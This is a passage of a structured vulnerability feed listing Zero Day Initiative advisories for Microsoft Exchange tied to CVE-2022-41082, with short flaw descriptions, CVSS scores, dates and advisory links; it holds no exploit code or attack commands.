"2023-08-11T22:17:46", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the G711Reader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange G711Reader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1630", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1630/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the DumpDataReader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange DumpDataReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1638", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1638/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:07", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the DbgEngDataReader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange DbgEngDataReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1643", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1643/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:17:57", "description": "This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the GsmWriter class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange GsmWriter Exposed Dangerous Function Denial-of-Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1629", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1629/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:18:25", "description": "This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the MsgStorageWriter class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange MsgStorageWriter Exposed Dangerous Function Denial-of-Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1626", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1626/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:18:36", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the PowerShell endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-17T00:00:00", "type": "zdi", "title": "Microsoft Exchange PowerShell Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1624", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1624/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:16:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the GsmReader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange GsmReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1634", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1634/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:17:29", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the PcmReader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange PcmReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1631", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1631/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:13:14", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the FileHandler class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange FileHandler Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1653", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1653/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:13:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the DagNetMultiValuedProperty class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange DagNetMultiValuedProperty Exposed Dangerous Function Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1654", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1654/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:07", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the MsiDatabase class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange MsiDatabase Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1645", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1645/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:07", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the EtwFile class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:
Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082
